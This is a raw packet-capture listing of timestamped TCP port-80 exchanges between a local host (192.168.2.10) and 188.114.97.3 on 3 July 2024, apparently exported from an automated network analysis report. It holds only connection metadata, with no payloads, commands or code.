                                                    Jul 3, 2024 16:43:56.719367981 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.797853947 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.802856922 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.804502010 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.806241989 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.811085939 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.964407921 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:56.969363928 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:56.969445944 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.043239117 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.068679094 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.088404894 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.151961088 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.156852007 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.189109087 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.269869089 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.282243967 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.400799990 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.400799990 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.612257004 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.651892900 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.727724075 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.727801085 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.728590965 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.732975960 CEST8049857188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.733027935 CEST4985780192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.733359098 CEST8049858188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.733402014 CEST4985880192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.733498096 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:57.733563900 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.733705044 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:57.738538980 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.068661928 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.073829889 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.089350939 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.094314098 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.166929007 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.167298079 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.172231913 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.172266960 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.179328918 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.292402983 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.421811104 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.469916105 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.512051105 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.540402889 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.540410042 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.545316935 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.545613050 CEST8049859188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.545707941 CEST4985980192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.545712948 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.545974970 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.550808907 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:58.901098013 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:58.907418966 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.023895979 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.088825941 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.374684095 CEST8049860188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.480606079 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.485862017 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.506932974 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.511867046 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.511940956 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.512029886 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.516882896 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.550674915 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.580305099 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.580445051 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.585582972 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.585593939 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.869689941 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.874778986 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.916098118 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:43:59.963274002 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:43:59.967328072 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.034526110 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.180957079 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.291419983 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.308410883 CEST4986080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.312412024 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.313646078 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.318592072 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.319138050 CEST8049861188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.320455074 CEST4986180192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.320569992 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.323920012 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.328792095 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.682584047 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.687556982 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.843276024 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:00.900973082 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.933501959 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:00.938457012 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.087047100 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.167434931 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.169346094 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.174240112 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.174331903 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.232861996 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.233612061 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.238018990 CEST8049862188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.238069057 CEST4986280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.238580942 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.238646984 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.238754034 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.243503094 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.556741953 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.588399887 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.593328953 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.682054996 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.691766024 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.709464073 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:01.809500933 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:01.885183096 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:02.059791088 CEST8049863188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:02.200407982 CEST4986380192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:02.700428963 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:02.705490112 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:02.798968077 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:02.799320936 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:02.804279089 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:02.804450989 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:03.267462969 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:03.385206938 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:04.276415110 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:04.283276081 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.376106024 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.376370907 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:04.381294966 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.381475925 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.708268881 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.841785908 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:04.843137026 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:05.854451895 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:05.859400034 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.074498892 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.074637890 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.079705954 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.079716921 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.401403904 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.533691883 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.533802032 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.869473934 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.874388933 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.967807055 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.968131065 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973316908 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973339081 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973349094 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973356009 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973386049 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973390102 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973402977 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973412037 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973416090 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973421097 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973431110 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973448992 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973470926 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.973561049 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.973603964 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978012085 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978029013 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978072882 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978095055 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978101969 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978111982 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978148937 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978204966 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978245974 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978259087 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978306055 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978318930 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978364944 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978394032 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978404999 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978424072 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978431940 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978456974 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978491068 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978535891 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978580952 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978590965 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978602886 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978614092 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978636980 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978661060 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978672028 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978682041 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978715897 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978737116 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978741884 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978746891 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978775024 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978784084 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.978791952 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.978830099 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.982930899 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.982959986 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.982990980 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983021021 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983093977 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983124018 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983139992 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983165026 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983207941 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983217955 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983258009 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983316898 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983326912 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983344078 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983352900 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983370066 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983397961 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983522892 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983535051 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983572960 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983592987 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983638048 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983658075 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983702898 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983710051 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983720064 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983761072 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983831882 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983841896 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.983880043 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.983994007 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984004021 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984021902 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984030962 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984041929 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:06.984049082 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984057903 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984101057 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984111071 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984131098 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984139919 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984179974 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984189987 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984236002 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984246016 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984347105 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984357119 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984473944 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984491110 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984508991 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984518051 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984535933 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984544992 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984561920 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984570980 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.984580994 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.987700939 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.987710953 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.987898111 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.987907887 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.988071918 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.988081932 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.988207102 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.988221884 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.988476038 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.988511086 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.988966942 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.988976955 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989106894 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989115953 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989211082 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989228010 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989444971 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989511013 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989526033 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989535093 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989625931 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989634991 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989703894 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989713907 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989752054 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989762068 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989856958 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989873886 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989878893 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989881039 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989881992 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.989886999 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990468025 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990475893 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990551949 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990581989 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990592003 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990607023 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990624905 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990636110 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990653992 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990662098 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990693092 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990701914 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990720034 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990729094 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990739107 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990808010 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990817070 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990827084 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990838051 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990847111 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990864038 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990873098 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990927935 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990937948 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990972042 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990981102 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990991116 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.990999937 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.991029978 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.991345882 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.991355896 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.991988897 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.992132902 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:06.992574930 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:07.541932106 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:07.560781956 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:07.652662039 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:07.652918100 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:07.657867908 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:07.658107042 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:07.880018950 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:07.951291084 CEST8049832188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:07.994537115 CEST4983280192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:08.072654009 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:08.964087009 CEST4983080192.168.2.10188.114.97.3
                                                    Jul 3, 2024 16:44:08.969050884 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:09.070147038 CEST8049830188.114.97.3192.168.2.10
                                                    Jul 3, 2024 16:44:09.072735071 CEST4983080192.168.2.10188.114.97.3
